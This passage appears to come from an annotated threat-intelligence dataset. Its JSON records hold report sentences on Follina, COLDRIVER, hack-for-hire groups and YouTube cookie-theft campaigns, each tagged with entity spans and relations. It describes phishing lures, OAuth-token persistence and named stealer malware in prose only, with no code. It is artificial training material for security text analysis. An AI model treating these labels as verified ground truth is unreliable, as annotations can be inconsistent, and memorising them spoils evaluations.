stopwar.pro.","entities":[{"id":50733,"label":"malware","start_offset":39,"end_offset":50},{"id":50732,"label":"SOFTWARE","start_offset":18,"end_offset":29},{"id":50734,"label":"malware","start_offset":52,"end_offset":68},{"id":50735,"label":"DOMAIN","start_offset":107,"end_offset":118}],"relations":[{"id":999,"from_id":50735,"to_id":50734,"type":"hosts"},{"id":1000,"from_id":50735,"to_id":50733,"type":"hosts"}],"Comments":[]} -{"id":4813,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50736,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} -{"id":4814,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50737,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} -{"id":4815,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50738,"label":"SOFTWARE","start_offset":43,"end_offset":54},{"id":50740,"label":"malware","start_offset":155,"end_offset":177},{"id":50739,"label":"threat-actor","start_offset":130,"end_offset":135}],"relations":[{"id":1001,"from_id":50740,"to_id":50738,"type":"impersonates"},{"id":1003,"from_id":50740,"to_id":50739,"type":"authored-by"}],"Comments":[]} -{"id":4816,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50744,"label":"identity","start_offset":188,"end_offset":197},{"id":50745,"label":"TIME","start_offset":80,"end_offset":83},{"id":50743,"label":"TIME","start_offset":159,"end_offset":163},{"id":50742,"label":"vulnerability","start_offset":16,"end_offset":54}],"relations":[],"Comments":[]} -{"id":4817,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50748,"label":"SOFTWARE","start_offset":62,"end_offset":110},{"id":50746,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50747,"label":"vulnerability","start_offset":0,"end_offset":7}],"relations":[{"id":1004,"from_id":50746,"to_id":50747,"type":"duplicate-of"},{"id":1005,"from_id":50748,"to_id":50747,"type":"has"}],"Comments":[]} -{"id":4818,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50750,"label":"identity","start_offset":35,"end_offset":38},{"id":50751,"label":"identity","start_offset":57,"end_offset":75},{"id":50752,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50753,"label":"threat-actor","start_offset":88,"end_offset":96},{"id":50749,"label":"identity","start_offset":16,"end_offset":23},{"id":50754,"label":"vulnerability","start_offset":132,"end_offset":153}],"relations":[{"id":1006,"from_id":50753,"to_id":50754,"type":"exploits"},{"id":1007,"from_id":50752,"to_id":50754,"type":"exploits"}],"Comments":[]} -{"id":4819,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":50755,"label":"campaign","start_offset":4,"end_offset":21},{"id":50756,"label":"SOFTWARE","start_offset":76,"end_offset":92},{"id":50757,"label":"location","start_offset":177,"end_offset":184}],"relations":[],"Comments":[]} -{"id":4820,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[{"id":50758,"label":"identity","start_offset":0,"end_offset":3},{"id":50759,"label":"location","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} -{"id":4821,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50760,"label":"identity","start_offset":44,"end_offset":51},{"id":50761,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50762,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50763,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":1008,"from_id":50761,"to_id":50763,"type":"impersonates"},{"id":1009,"from_id":50761,"to_id":50762,"type":"uses"}],"Comments":[]} -{"id":4822,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50765,"label":"malware","start_offset":137,"end_offset":158},{"id":50764,"label":"threat-actor","start_offset":97,"end_offset":102}],"relations":[{"id":1010,"from_id":50764,"to_id":50765,"type":"uses"}],"Comments":[]} -{"id":4823,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50766,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50767,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50768,"label":"location","start_offset":50,"end_offset":57}],"relations":[{"id":1011,"from_id":50767,"to_id":50766,"type":"duplicate-of"},{"id":1012,"from_id":50766,"to_id":50768,"type":"attributed-to"}],"Comments":[]} -{"id":4824,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50769,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50770,"label":"identity","start_offset":74,"end_offset":77},{"id":50771,"label":"TIME","start_offset":110,"end_offset":115}],"relations":[],"Comments":[]} -{"id":4825,"text":"An example of this technique, used to target Facebook users, can be seen in the screenshot below.","entities":[{"id":50772,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} -{"id":4826,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50774,"label":"location","start_offset":13,"end_offset":20},{"id":50775,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50773,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50776,"label":"attack-pattern","start_offset":93,"end_offset":119}],"relations":[{"id":1013,"from_id":50773,"to_id":50774,"type":"located-at"},{"id":1014,"from_id":50775,"to_id":50773,"type":"duplicate-of"}],"Comments":[]} -{"id":4827,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":50777,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":50779,"label":"SOFTWARE","start_offset":135,"end_offset":154},{"id":50778,"label":"SOFTWARE","start_offset":118,"end_offset":130}],"relations":[],"Comments":[]} -{"id":4829,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":50782,"label":"SOFTWARE","start_offset":49,"end_offset":69},{"id":50781,"label":"attack-pattern","start_offset":6,"end_offset":14}],"relations":[],"Comments":[]} -{"id":4830,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50783,"label":"identity","start_offset":71,"end_offset":78},{"id":50785,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50786,"label":"tools","start_offset":257,"end_offset":270},{"id":50784,"label":"identity","start_offset":136,"end_offset":175},{"id":14710,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":14713,"label":"threat-actor","start_offset":82,"end_offset":90}],"relations":[{"id":1015,"from_id":14713,"to_id":14710,"type":"duplicate-of"},{"id":1016,"from_id":14710,"to_id":50784,"type":"targets"},{"id":1017,"from_id":14710,"to_id":50785,"type":"uses"},{"id":1018,"from_id":14710,"to_id":50786,"type":"uses"}],"Comments":[]} -{"id":4831,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50787,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} -{"id":4833,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've published analysis on a range of persistent threats including government-backed attackers, commercial surveillance vendors, and serious criminal operators.","entities":[{"id":50790,"label":"identity","start_offset":11,"end_offset":14},{"id":50789,"label":"identity","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} -{"id":4834,"text":"Today, we're sharing intelligence on a segment of attackers we call hack-for-hire, whose niche focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50791,"label":"attack-pattern","start_offset":68,"end_offset":81}],"relations":[],"Comments":[]} -{"id":4835,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50792,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} -{"id":4836,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":4837,"text":"Both, however, enable attacks by those who would otherwise lack the capabilities to do so.","entities":[],"relations":[],"Comments":[]} -{"id":4838,"text":"We have seen hack-for-hire groups target human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk.","entities":[{"id":50793,"label":"attack-pattern","start_offset":13,"end_offset":26}],"relations":[],"Comments":[]} -{"id":4839,"text":"They also conduct corporate espionage, handily obscuring their clients’ role.","entities":[],"relations":[],"Comments":[]} -{"id":4840,"text":"To help users and defenders, we will provide examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates and context around their capabilities and persistence mechanisms.","entities":[{"id":50794,"label":"attack-pattern","start_offset":61,"end_offset":74},{"id":50795,"label":"location","start_offset":90,"end_offset":95},{"id":50797,"label":"location","start_offset":113,"end_offset":133},{"id":50796,"label":"location","start_offset":97,"end_offset":103}],"relations":[],"Comments":[]} -{"id":4841,"text":"The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients.","entities":[],"relations":[],"Comments":[]} -{"id":4842,"text":"Some hack-for-hire attackers openly advertise their products and services to anyone willing to pay, while others operate more discreetly selling to a limited audience.","entities":[{"id":50798,"label":"attack-pattern","start_offset":5,"end_offset":18}],"relations":[],"Comments":[]} -{"id":4843,"text":"For example, TAG has observed Indian hack-for-hire firms work with third party private investigative services — intermediaries that reach out for services when a client requires them — and provide data exfiltrated from a successful operation.","entities":[{"id":50800,"label":"location","start_offset":30,"end_offset":36},{"id":50801,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50799,"label":"identity","start_offset":13,"end_offset":16}],"relations":[],"Comments":[]} -{"id":4844,"text":"This is detailed in depth in today’s Reuters investigation into the Indian hack-for-hire ecosystem.","entities":[{"id":50803,"label":"location","start_offset":68,"end_offset":74},{"id":50802,"label":"attack-pattern","start_offset":75,"end_offset":88}],"relations":[],"Comments":[]} -{"id":4845,"text":"We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves.","entities":[{"id":50804,"label":"location","start_offset":22,"end_offset":28},{"id":50805,"label":"identity","start_offset":29,"end_offset":48}],"relations":[{"id":1019,"from_id":50805,"to_id":50804,"type":"located-at"}],"Comments":[]} -{"id":4846,"text":"The breadth of targets in hack-for-hire campaigns stands in contrast to many government-backed operations, which often have a clearer delineation of mission and targets.","entities":[{"id":50806,"label":"attack-pattern","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} -{"id":4847,"text":"A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel.","entities":[{"id":50812,"label":"location","start_offset":200,"end_offset":206},{"id":50809,"label":"location","start_offset":96,"end_offset":102},{"id":50807,"label":"location","start_offset":26,"end_offset":32},{"id":50808,"label":"identity","start_offset":33,"end_offset":55},{"id":50810,"label":"location","start_offset":132,"end_offset":139},{"id":50811,"label":"location","start_offset":166,"end_offset":173}],"relations":[{"id":1020,"from_id":50808,"to_id":50807,"type":"located-at"},{"id":1021,"from_id":50808,"to_id":50809,"type":"targets"},{"id":1023,"from_id":50808,"to_id":50811,"type":"targets"},{"id":1024,"from_id":50808,"to_id":50812,"type":"targets"},{"id":1022,"from_id":50808,"to_id":50810,"type":"targets"}],"Comments":[]} -{"id":4849,"text":"Since 2012, TAG has been tracking an interwoven set of Indian hack-for-hire actors, with many having previously worked for Indian offensive security providers Appin and Belltrox.","entities":[{"id":50814,"label":"TIME","start_offset":6,"end_offset":10},{"id":50815,"label":"location","start_offset":55,"end_offset":61},{"id":50816,"label":"attack-pattern","start_offset":62,"end_offset":75},{"id":50817,"label":"location","start_offset":123,"end_offset":129},{"id":50818,"label":"identity","start_offset":159,"end_offset":164},{"id":50819,"label":"identity","start_offset":169,"end_offset":177}],"relations":[],"Comments":[]} -{"id":4850,"text":"One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns.","entities":[{"id":50820,"label":"location","start_offset":95,"end_offset":107},{"id":50821,"label":"location","start_offset":113,"end_offset":133},{"id":50822,"label":"location","start_offset":139,"end_offset":146},{"id":50823,"label":"campaign","start_offset":152,"end_offset":181}],"relations":[{"id":1025,"from_id":50823,"to_id":50822,"type":"targets"},{"id":1026,"from_id":50823,"to_id":50820,"type":"targets"},{"id":1027,"from_id":50823,"to_id":50821,"type":"targets"}],"Comments":[]} -{"id":4851,"text":"These credential phishing campaigns have ranged from targeting specific government organizations to AWS accounts to Gmail accounts.","entities":[{"id":50825,"label":"campaign","start_offset":6,"end_offset":35},{"id":50826,"label":"SOFTWARE","start_offset":100,"end_offset":103},{"id":50827,"label":"SOFTWARE","start_offset":116,"end_offset":121}],"relations":[],"Comments":[]} -{"id":4852,"text":"TAG has linked former employees of both Appin and Belltrox to Rebsec, a new firm that openly advertises corporate espionage as an offering on its company website.","entities":[{"id":50828,"label":"identity","start_offset":0,"end_offset":3},{"id":50829,"label":"identity","start_offset":40,"end_offset":45},{"id":50831,"label":"identity","start_offset":62,"end_offset":68},{"id":50830,"label":"identity","start_offset":50,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4854,"text":"While investigating a 2017 credential phishing campaign that targeted a prominent Russian anti-corruption journalist, we discovered the Russian attacker targeting other journalists, politicians across Europe, and various NGOs and non-profit organizations.","entities":[{"id":50833,"label":"TIME","start_offset":22,"end_offset":26},{"id":50835,"label":"location","start_offset":201,"end_offset":207},{"id":50834,"label":"campaign","start_offset":27,"end_offset":55},{"id":50836,"label":"identity","start_offset":213,"end_offset":254}],"relations":[],"Comments":[]} -{"id":4856,"text":"This hack-for-hire actor has been publicly referred to as 'Void Balaur'.","entities":[{"id":50838,"label":"attack-pattern","start_offset":5,"end_offset":18},{"id":14831,"label":"threat-actor","start_offset":59,"end_offset":70}],"relations":[],"Comments":[]} -{"id":4857,"text":"These campaigns were similar regardless of target, consisting of a credential phishing email with a link to an attacker-controlled phishing page.","entities":[{"id":50839,"label":"attack-pattern","start_offset":67,"end_offset":86}],"relations":[],"Comments":[]} -{"id":4858,"text":"The lures ranged from fake Gmail and other webmail provider notifications to messages spoofing Russian government organizations.","entities":[{"id":50841,"label":"location","start_offset":95,"end_offset":102},{"id":50840,"label":"SOFTWARE","start_offset":27,"end_offset":32}],"relations":[],"Comments":[]} -{"id":4859,"text":"After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP.","entities":[{"id":50842,"label":"SOFTWARE","start_offset":154,"end_offset":165}],"relations":[],"Comments":[]} -{"id":4860,"text":"Both OAuth tokens and App Passwords are revoked when a user changes their password.","entities":[],"relations":[],"Comments":[]} -{"id":4861,"text":"During our early investigation, TAG discovered the attacker’s public website (no longer available) advertising account hacking capabilities for email and social media services.","entities":[{"id":50843,"label":"identity","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} -{"id":4862,"text":"The site claimed to have received positive reviews on Russian underground forums such as Dublikat and Probiv.cc.","entities":[{"id":50845,"label":"DOMAIN","start_offset":102,"end_offset":111},{"id":50844,"label":"location","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} -{"id":4863,"text":"Over the past five years, TAG has observed the group targeting accounts at major webmail providers like Gmail, Hotmail, and Yahoo! and regional webmail providers like abv.bg, mail.ru, inbox.lv, and UKR.net.","entities":[{"id":50846,"label":"identity","start_offset":26,"end_offset":29},{"id":50847,"label":"SOFTWARE","start_offset":104,"end_offset":109},{"id":50849,"label":"SOFTWARE","start_offset":124,"end_offset":130},{"id":50848,"label":"SOFTWARE","start_offset":111,"end_offset":118},{"id":50850,"label":"SOFTWARE","start_offset":167,"end_offset":173},{"id":50851,"label":"SOFTWARE","start_offset":175,"end_offset":182},{"id":50852,"label":"SOFTWARE","start_offset":184,"end_offset":192},{"id":50853,"label":"SOFTWARE","start_offset":198,"end_offset":205}],"relations":[],"Comments":[]} -{"id":4864,"text":"United Arab Emirates TAG is also tracking a hack-for-hire group now based in the United Arab Emirates that is mostly active in the Middle East and North Africa.","entities":[{"id":50856,"label":"location","start_offset":131,"end_offset":142},{"id":50857,"label":"location","start_offset":147,"end_offset":159},{"id":50854,"label":"identity","start_offset":0,"end_offset":24},{"id":50855,"label":"location","start_offset":81,"end_offset":101}],"relations":[],"Comments":[]} -{"id":4865,"text":"They have primarily targeted government, education, and political organizations including Middle East focused NGOs in Europe and the Palestinian political party Fatah.","entities":[{"id":50860,"label":"location","start_offset":133,"end_offset":144},{"id":50861,"label":"identity","start_offset":161,"end_offset":166},{"id":50858,"label":"location","start_offset":90,"end_offset":101},{"id":50859,"label":"location","start_offset":118,"end_offset":124},{"id":50862,"label":"identity","start_offset":110,"end_offset":114}],"relations":[],"Comments":[]} -{"id":4866,"text":"Amnesty International has also reported on their campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":4867,"text":"The group commonly uses Google or OWA password reset lures to steal credentials from targets, often using the MailJet or SendGrid API to send phishing emails.","entities":[{"id":50863,"label":"SOFTWARE","start_offset":24,"end_offset":30},{"id":50864,"label":"SOFTWARE","start_offset":34,"end_offset":37},{"id":50865,"label":"attack-pattern","start_offset":38,"end_offset":92},{"id":50866,"label":"SOFTWARE","start_offset":110,"end_offset":117},{"id":50867,"label":"SOFTWARE","start_offset":121,"end_offset":129}],"relations":[],"Comments":[]} -{"id":4868,"text":"Unlike many hack-for-hire actors that use open source phishing frameworks like Evilginx or GoPhish, this group uses a custom phishing kit that utilizes Selenium, a self described 'suite of tools for automating web browsers.'","entities":[{"id":50868,"label":"tools","start_offset":79,"end_offset":87},{"id":50869,"label":"tools","start_offset":91,"end_offset":98},{"id":50870,"label":"tools","start_offset":152,"end_offset":160}],"relations":[],"Comments":[]} -{"id":4869,"text":"Previously described by Amnesty, this phishing kit has remained under active development over the past five years.","entities":[{"id":50871,"label":"identity","start_offset":24,"end_offset":31}],"relations":[],"Comments":[]} -{"id":4870,"text":"After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider.","entities":[{"id":50872,"label":"SOFTWARE","start_offset":132,"end_offset":143},{"id":50873,"label":"SOFTWARE","start_offset":170,"end_offset":175}],"relations":[],"Comments":[]} -{"id":4871,"text":"The attacker would then use a custom tool to download the mailbox contents via IMAP.","entities":[],"relations":[],"Comments":[]} -{"id":4872,"text":"This group also has links to the original developers of H-Worm, also known as njRAT.","entities":[{"id":50874,"label":"malware","start_offset":56,"end_offset":62},{"id":14895,"label":"malware","start_offset":78,"end_offset":83}],"relations":[{"id":1028,"from_id":14895,"to_id":50874,"type":"duplicate-of"}],"Comments":[]} -{"id":4873,"text":"In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm.","entities":[{"id":50875,"label":"TIME","start_offset":3,"end_offset":7},{"id":50877,"label":"identity","start_offset":61,"end_offset":81},{"id":50878,"label":"malware","start_offset":124,"end_offset":130},{"id":50876,"label":"identity","start_offset":9,"end_offset":18}],"relations":[{"id":1029,"from_id":50878,"to_id":50877,"type":"authored-by"}],"Comments":[]} -{"id":4874,"text":"Benabdellah, who also goes by the moniker Houdini, has been actively involved in the day-to-day development and operational deployment of the credential phishing capabilities used by this group since its inception.","entities":[{"id":50881,"label":"attack-pattern","start_offset":142,"end_offset":161},{"id":50879,"label":"identity","start_offset":0,"end_offset":11},{"id":50880,"label":"identity","start_offset":42,"end_offset":49}],"relations":[{"id":1030,"from_id":50880,"to_id":50879,"type":"duplicate-of"}],"Comments":[]} -{"id":4875,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[],"relations":[],"Comments":[]} -{"id":4876,"text":"Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further harm.","entities":[{"id":50882,"label":"SOFTWARE","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} -{"id":4877,"text":"We encourage any high risk user to enable Advanced Protection and Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[{"id":50883,"label":"SOFTWARE","start_offset":66,"end_offset":109},{"id":50884,"label":"SOFTWARE","start_offset":42,"end_offset":61}],"relations":[],"Comments":[]} -{"id":4878,"text":"Additionally, our CyberCrime Investigation Group is sharing relevant details and indicators with law enforcement.","entities":[{"id":50885,"label":"identity","start_offset":18,"end_offset":48}],"relations":[],"Comments":[]} -{"id":4879,"text":"TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted.","entities":[{"id":50886,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4880,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across the industry.","entities":[],"relations":[],"Comments":[]} -{"id":4881,"text":" With contributions from Winnona DeSombre UAE hack-for-hire Group Domains: Indian hack-for-hire Group Domains: Russian hack-for-hire Group Domains:","entities":[{"id":50889,"label":"location","start_offset":75,"end_offset":81},{"id":50888,"label":"location","start_offset":42,"end_offset":45},{"id":50890,"label":"location","start_offset":111,"end_offset":118},{"id":50887,"label":"identity","start_offset":25,"end_offset":41}],"relations":[],"Comments":[]} -{"id":4882,"text":"Google’s Threat Analysis Group tracks actors involved in disinformation campaigns, government backed hacking, and financially motivated abuse.","entities":[{"id":50891,"label":"identity","start_offset":0,"end_offset":30}],"relations":[],"Comments":[]} -{"id":4883,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":50892,"label":"TIME","start_offset":11,"end_offset":15},{"id":50893,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} -{"id":4884,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[],"relations":[],"Comments":[]} -{"id":4885,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":50896,"label":"identity","start_offset":38,"end_offset":52},{"id":50897,"label":"identity","start_offset":54,"end_offset":84},{"id":50898,"label":"identity","start_offset":89,"end_offset":108},{"id":50894,"label":"identity","start_offset":22,"end_offset":29},{"id":50899,"label":"SOFTWARE","start_offset":182,"end_offset":187},{"id":50895,"label":"identity","start_offset":31,"end_offset":36},{"id":50900,"label":"TIME","start_offset":203,"end_offset":211}],"relations":[],"Comments":[]} -{"id":4886,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[],"relations":[],"Comments":[]} -{"id":4887,"text":"With increased detection efforts, we’ve observed attackers shifting away from Gmail to other email providers (mostly email.cz, seznam.cz, post.cz and aol.com).","entities":[{"id":50905,"label":"identity","start_offset":150,"end_offset":157},{"id":50901,"label":"SOFTWARE","start_offset":78,"end_offset":83},{"id":50903,"label":"identity","start_offset":127,"end_offset":136},{"id":50902,"label":"identity","start_offset":117,"end_offset":125},{"id":50904,"label":"identity","start_offset":138,"end_offset":145}],"relations":[],"Comments":[]} -{"id":4888,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[{"id":50906,"label":"identity","start_offset":75,"end_offset":78}],"relations":[],"Comments":[]} -{"id":4889,"text":"In this blog, we share examples of the specific tactics, techniques and procedures (TTPs) used to lure victims, as well as some guidance on how users can further protect themselves.","entities":[],"relations":[],"Comments":[]} -{"id":4890,"text":"Cookie Theft, also known as “pass-the-cookie attack,” is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":50907,"label":"attack-pattern","start_offset":0,"end_offset":12},{"id":50908,"label":"attack-pattern","start_offset":29,"end_offset":51},{"id":14981,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} -{"id":4891,"text":"While the technique has been around for decades, its resurgence as a top security risk could be due to a wider adoption of multi-factor authentication (MFA) making it difficult to conduct abuse, and shifting attacker focus to social engineering tactics.","entities":[{"id":50909,"label":"attack-pattern","start_offset":226,"end_offset":244}],"relations":[],"Comments":[]} -{"id":4892,"text":" Many YouTube creators provide an email address on their channel for business opportunities.","entities":[],"relations":[],"Comments":[]} -{"id":4893,"text":"In this case, the attackers sent forged business emails impersonating an existing company requesting a video advertisement collaboration.","entities":[],"relations":[],"Comments":[]} -{"id":4894,"text":"The phishing typically started with a customized email introducing the company and its products.","entities":[{"id":50910,"label":"attack-pattern","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} -{"id":4895,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":50911,"label":"SOFTWARE","start_offset":127,"end_offset":139}],"relations":[],"Comments":[]} -{"id":4896,"text":"Around 15,000 actor accounts were identified, most of which were created for this campaign specifically.","entities":[],"relations":[],"Comments":[]} -{"id":4897,"text":" The attackers registered various domains associated with forged companies and built multiple websites for malware delivery.","entities":[],"relations":[],"Comments":[]} -{"id":4898,"text":"To date, we’ve identified at least 1,011 domains created solely for this purpose.","entities":[],"relations":[],"Comments":[]} -{"id":4899,"text":"Some of the websites impersonated legitimate software sites, such as Luminar, Cisco VPN, games on Steam, and some were generated using online templates.","entities":[{"id":50914,"label":"SOFTWARE","start_offset":78,"end_offset":87},{"id":50915,"label":"SOFTWARE","start_offset":89,"end_offset":103},{"id":50913,"label":"SOFTWARE","start_offset":69,"end_offset":76}],"relations":[],"Comments":[]} -{"id":4900,"text":"During the pandemic, we also uncovered attackers posing as news providers with a “Covid19 news software.”","entities":[],"relations":[],"Comments":[]} -{"id":4901,"text":"In one case, we observed a fake social media page copying content from an existing software company.","entities":[],"relations":[],"Comments":[]} -{"id":4902,"text":"The following screenshot is an example of a fake page where the original URL is replaced with one leading to a cookie theft malware download.","entities":[],"relations":[],"Comments":[]} -{"id":4903,"text":"Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.","entities":[{"id":50917,"label":"attack-pattern","start_offset":45,"end_offset":53},{"id":50918,"label":"SOFTWARE","start_offset":69,"end_offset":74},{"id":50919,"label":"SOFTWARE","start_offset":140,"end_offset":148},{"id":50920,"label":"SOFTWARE","start_offset":150,"end_offset":158},{"id":50921,"label":"SOFTWARE","start_offset":162,"end_offset":169},{"id":50916,"label":"identity","start_offset":8,"end_offset":14}],"relations":[],"Comments":[]} -{"id":4904,"text":" Once the target runs the fake software, a cookie stealing malware executes, taking browser cookies from the victim’s machine and uploading them to the actor's command & control servers.","entities":[],"relations":[],"Comments":[]} -{"id":4905,"text":"Although this type of malware can be configured to be persistent on the victim's machine, these actors are running all malware in non-persistent mode as a smash-and-grab technique.","entities":[],"relations":[],"Comments":[]} -{"id":4906,"text":"This is because if the malicious file is not detected when executed, there are less artifacts on an infected host and therefore security products fail to notify the user of a past compromise.","entities":[],"relations":[],"Comments":[]} -{"id":4907,"text":"We have observed that actors use various types of malware based on personal preference, most of which are easily available on Github.","entities":[{"id":50922,"label":"SOFTWARE","start_offset":126,"end_offset":132}],"relations":[],"Comments":[]} -{"id":4908,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.","entities":[{"id":50930,"label":"malware","start_offset":106,"end_offset":119},{"id":50931,"label":"malware","start_offset":121,"end_offset":134},{"id":50925,"label":"malware","start_offset":53,"end_offset":71},{"id":50926,"label":"malware","start_offset":73,"end_offset":86},{"id":50927,"label":"malware","start_offset":88,"end_offset":95},{"id":50928,"label":"malware","start_offset":97,"end_offset":104},{"id":50932,"label":"malware","start_offset":136,"end_offset":141},{"id":50933,"label":"malware","start_offset":165,"end_offset":171},{"id":50934,"label":"malware","start_offset":224,"end_offset":229},{"id":50923,"label":"malware","start_offset":37,"end_offset":44},{"id":50924,"label":"malware","start_offset":46,"end_offset":51}],"relations":[{"id":1032,"from_id":50933,"to_id":50934,"type":"variant-of"}],"Comments":[]} -{"id":4909,"text":"Open source malware like Sorano and AdamantiumThief were also observed.","entities":[{"id":50935,"label":"malware","start_offset":25,"end_offset":31},{"id":50936,"label":"malware","start_offset":36,"end_offset":51}],"relations":[],"Comments":[]} -{"id":4910,"text":"Related hashes are listed in the Technical Details section, at the end of this report.","entities":[],"relations":[],"Comments":[]} -{"id":4911,"text":"Most of the observed malware was capable of stealing both user passwords and cookies.","entities":[],"relations":[],"Comments":[]} -{"id":4912,"text":"Some of the samples employed several anti-sandboxing techniques including enlarged files, encrypted archive and download IP cloaking.","entities":[],"relations":[],"Comments":[]} -{"id":4913,"text":"A few were observed displaying a fake error message requiring user click-through to 